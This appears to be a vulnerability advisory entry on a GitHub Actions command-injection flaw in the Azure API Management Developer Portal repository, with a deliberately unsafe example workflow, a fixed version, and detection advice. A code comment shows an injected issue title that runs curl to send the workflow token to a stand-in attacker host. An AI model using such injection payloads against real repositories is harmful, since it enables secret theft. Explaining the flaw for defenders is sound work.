high

Code Execution in Azure API Management Developer Portal

Published Wed, Dec 11th, 2024

Platforms

azure

Summary

A vulnerability in the Azure API Management Developer Portal repository allowed arbitrary code execution and secret exfiltration. The issue stemmed from a GitHub Actions workflow that loaded untrusted data from newly opened issues into a shell step, allowing an attacker to inject commands. The injected commands would run on the workflow runner, exposing the tokens and permissions available to that job.
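The pattern described above, as an added illustration rather than the project's actual workflow: a constructed issue-triage workflow that interpolates the issue title directly into a `run` script, followed by the corrected form that passes the same value through an environment variable so the shell treats it as data, not code. The workflow name, job name and step contents are constructed for this example.

```yaml
# Constructed example (not the affected repository's workflow).
name: issue-triage
on:
  issues:
    types: [opened]

jobs:
  # WEAK: the ${{ }} expression is expanded by Actions before the shell
  # runs, so an issue title such as `x"; curl attacker/$GITHUB_TOKEN; "`
  # becomes part of the script and executes on the runner.
  triage-unsafe:
    runs-on: ubuntu-latest
    steps:
      - run: echo "New issue: ${{ github.event.issue.title }}"

  # CORRECTED: the untrusted value is handed to the step as an environment
  # variable. The shell sees a literal variable reference and never parses
  # the attacker-controlled text as script. Permissions are also narrowed
  # so that even a compromised step holds no write capability.
  triage-safe:
    runs-on: ubuntu-latest
    permissions:
      contents: read
      issues: read
    steps:
      - env:
          ISSUE_TITLE: ${{ github.event.issue.title }}
        run: echo "New issue: $ISSUE_TITLE"
```

When auditing workflows, search `run:` and `script:` blocks for any `${{ github.event.* }}` field that an external user controls (issue and PR titles, bodies, comments, branch names, commit messages) and move each one into `env:`.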

Affected Services

API Management Developer Portal

Remediation

None required

Tracked CVEs

No tracked CVEs

References

Contributed by https://github.com/korniko98

Entry Status

Stub (AI-Generated)

Disclosure Date

Tue, Oct 22nd, 2024

Exploitability Period

Until 2024/11/04

Known ITW Exploitation

-

Detection Methods

Monitor GitHub Actions workflow runs for unexpected network activity or unusual commands in jobs triggered by issue, pull request or comment events, since those events carry user-supplied data. Review and audit workflow definitions for untrusted event fields interpolated directly into `run` steps, and confirm that such jobs hold only the minimum token permissions they need.

Piercing Index Rating

-

Discovered by

Alvaro Munoz, GitHub Security Lab